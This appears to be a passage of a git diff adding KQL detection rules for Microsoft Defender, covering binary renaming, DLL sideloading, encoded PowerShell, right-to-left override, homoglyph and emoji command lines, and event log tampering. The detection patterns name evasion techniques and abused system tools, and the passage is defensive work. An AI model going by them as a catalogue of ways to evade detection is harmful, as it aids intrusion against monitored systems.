ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql new file mode 100644 index 00000000..969840b0 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql @@ -0,0 +1,12 @@ +// Title: Potential Defense Evasion Via Binary Rename +// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) +// Date: 2019-06-15 +// Level: medium +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql new file mode 100644 index 00000000..6f6fd84c --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql @@ -0,0 +1,13 @@ +// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 +// Date: 2019-06-15 +// Level: high +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist +// - PsExec installed via Windows Store doesn't contain original filename field (False negative) + +DeviceProcessEvents +| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql new file mode 100644 index 00000000..094b8395 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql @@ -0,0 +1,14 @@ +// Title: Potential Defense Evasion Via Right-to-Left Override +// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. +This is used as an obfuscation and masquerading techniques. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.002 +// False Positives: +// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character + +DeviceProcessEvents +| where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql new file mode 100644 index 00000000..aa3c0853 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of DBGCORE.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects DLL sideloading of "dbgcore.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents +| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql new file mode 100644 index 00000000..6f57d451 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Of DBGHELP.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects potential DLL sideloading of "dbghelp.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents +| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql new file mode 100644 index 00000000..24a6fe3e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql new file mode 100644 index 00000000..075a86e3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Sideloading Via ClassicExplorer32.dll +// Author: frack113 +// Date: 2022-12-13 +// Level: medium +// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql new file mode 100644 index 00000000..fa0f3ac5 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Via comctl32.dll +// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) +// Date: 2022-12-16 +// Level: high +// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql new file mode 100644 index 00000000..29802420 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Sideloading Via JsSchHlp +// Author: frack113 +// Date: 2022-12-14 +// Level: medium +// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql new file mode 100644 index 00000000..da146b02 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql @@ -0,0 +1,10 @@ +// Title: Potential Encoded PowerShell Patterns In CommandLine +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: low +// Description: Detects specific combinations of encoding methods in PowerShell via the commandline +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql new file mode 100644 index 00000000..737412a3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential EventLog File Location Tampering +// Author: D3F7A5105 +// Date: 2023-01-02 +// Level: high +// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql new file mode 100644 index 00000000..96822dbf --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql @@ -0,0 +1,13 @@ +// Title: Potential Fake Instance Of Hxtsr.EXE Executed +// Author: Sreeman +// Date: 2020-04-17 +// Level: medium +// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. +HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". +Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql new file mode 100644 index 00000000..54ee0585 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql @@ -0,0 +1,12 @@ +// Title: Potential File Download Via MS-AppInstaller Protocol Handler +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: medium +// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE +The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql new file mode 100644 index 00000000..7d0607bb --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql @@ -0,0 +1,13 @@ +// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream +// Author: Scoubi (@ScoubiMtl) +// Date: 2023-10-09 +// Level: medium +// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath contains "::$index_allocation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql new file mode 100644 index 00000000..34c2ae61 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql @@ -0,0 +1,13 @@ +// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI +// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) +// Date: 2023-10-09 +// Level: medium +// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "::$index_allocation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql new file mode 100644 index 00000000..cab5b704 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql @@ -0,0 +1,15 @@ +// Title: Potential Homoglyph Attack Using Lookalike Characters +// Author: Micah Babinski, @micahbabinski +// Date: 2023-05-07 +// Level: medium +// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. +This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 +// False Positives: +// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. + +DeviceProcessEvents +| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or 